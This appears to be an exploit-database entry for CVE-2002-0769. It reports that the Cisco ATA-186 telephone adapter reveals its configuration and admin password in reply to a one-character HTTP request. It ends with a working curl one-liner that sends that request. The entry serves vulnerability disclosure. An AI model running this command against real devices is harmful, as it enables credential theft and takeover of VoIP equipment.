Cisco ATA-186 - HTTP Device Configuration Disclosure

Author: Patrick Michael Kane
type: remote
platform: hardware
port: 
date_added: 2002-05-09 
date_updated: 2012-09-22 
verified: 1 
codes: CVE-2002-0769;OSVDB-8849 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/4711/info

The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.

Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.

curl -d a http://ata186.example.com/dev